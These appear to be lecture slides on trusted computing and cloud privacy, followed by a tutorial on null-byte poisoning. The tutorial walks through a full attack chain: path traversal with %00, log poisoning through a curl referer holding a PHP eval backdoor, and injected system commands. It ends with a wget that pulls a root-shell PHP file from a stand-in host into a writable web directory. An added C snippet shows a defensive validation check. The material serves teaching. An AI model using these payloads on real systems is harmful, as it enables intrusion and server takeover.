Trusted computing and the cloud

UNR – CSE, Jeff Naruchitparames 2

( and null-byte poisoning attacks for the web )

Computer architecture

Security... privacy

Digital & physical threats

1. Identification – cryptographic

2. Attestation – digital signatures

3. Normal operating environment – from the computer's environment

(remotely, too!)

Control!

Trusted platform module (TPM)

Trusted computing group (TCG)

Root of trust

Dictate accessibility (permissions) a user has

But wait! … this is not a bad thing

Software as a Service, SaaS

Platform as a Service, PaaS

Infrastructure as a Service, IaaS

Problem: Storage

Solution: Encryption, duh!

Problem: Processing/computation of information

Solution: ???

Without looking!

Blind processing

Ensuring security and, in particular, privacy of information from third parties (sys admins, users, hackers, etc.)

Why so important?

ISPs

Power grid owners

Google, Amazon, other web 2.0 companies, etc

Political, economic, competition, etc

Technical details for another day...

Null-byte poisoning attacks (null-byte injection)

Add URL-encoded null-byte characters (%00, 0x00) to user-supplied data

Bypass input sanity checking filters

JavaScript, ASP

Processing accomplished by C/C++ functions

NULL

= string termination or delimiter

= stop processing a string

= bytes following delimiter will be ignored

If a string loses its null character, the length of the string = unknown...

… until memory pointer finds the next null byte.

http://foo.org/index.php[?lang=bar]

/web/htdocs/foo/

Template file includes, yay!

http://foo.org/index.php?lang=../../../etc/password%00
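
The mismatch described in these slides, as an added example that is not part of the original deck: a length-aware check sees the bytes after the decoded %00, a C string function does not. It assumes the application appends `.php` to `lang` before the include; `url_decode`, `has_suffix`, `lang_is_valid` and the lowercase-letter allowlist are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode src into dst (dst must hold strlen(src)+1 bytes).
   Returns the decoded length, which may include embedded 0x00 bytes. */
size_t url_decode(const char *src, char *dst) {
    size_t n = 0;
    while (*src) {
        if (src[0] == '%' && isxdigit((unsigned char)src[1]) &&
            isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], '\0' };
            dst[n++] = (char)strtol(hex, NULL, 16);
            src += 3;
        } else {
            dst[n++] = *src++;
        }
    }
    dst[n] = '\0';
    return n;
}

/* Length-aware suffix test, the way a script-level filter sees the value. */
int has_suffix(const char *buf, size_t len, const char *suffix) {
    size_t s = strlen(suffix);
    return len >= s && memcmp(buf + len - s, suffix, s) == 0;
}

/* Hardened check for a language code: no NUL inside the counted length,
   and only lowercase letters (assumed allowlist), 1 to 8 bytes. */
int lang_is_valid(const char *buf, size_t len) {
    if (len == 0 || len > 8 || memchr(buf, '\0', len)) return 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] < 'a' || buf[i] > 'z') return 0;
    return 1;
}

int main(void) {
    /* Constructed sample: the lang value from the slide, still URL-encoded. */
    const char *raw = "../../../etc/password%00";
    char path[64];
    size_t len = url_decode(raw, path);
    memcpy(path + len, ".php", 5);      /* application appends its extension */
    printf("filter: %zu bytes, ends in .php: %d\n", len + 4, has_suffix(path, len + 4, ".php"));
    printf("C layer: %zu bytes: %s\n", strlen(path), path);
    printf("hardened check accepts lang: %d\n", lang_is_valid(path, len));
    return 0;
}
```

Validating the decoded value against its counted length, before any suffix is appended, is what closes the gap.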

http://foo.org/index.php?lang=../../../proc/self/fd/2%00

Inject shellcode via symbolic links from /proc/self/<whatever>.

This example assumes Apache error logs are located in /proc/self/fd/2

Now what?

Note: Error logs are typically written without filtering referer variables (from browsers)

curl "http://foo.org/" -H "Host:" --referer '<?php eval($_GET[cmd]); ?>'

[Mon Feb 08 09:27:45 2010] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>

http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('pwd')

Write issues?! (permissions)

http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('find -type d -perm 0777')

Assume we find a writable directory at: /home/user/public_html/php_files_for_school/

Injection time!

http://foo.org/index.php?lang=../../../proc/self/fd/2%00&cmd=system('wget -O /home/user/public_html/php_files_for_school/homework3.php http://haxor.website/files/amazing_shellcode_to_obtain_root_access/get_root_shell.php');

Privilege escalation

Responsible disclosure! YEAH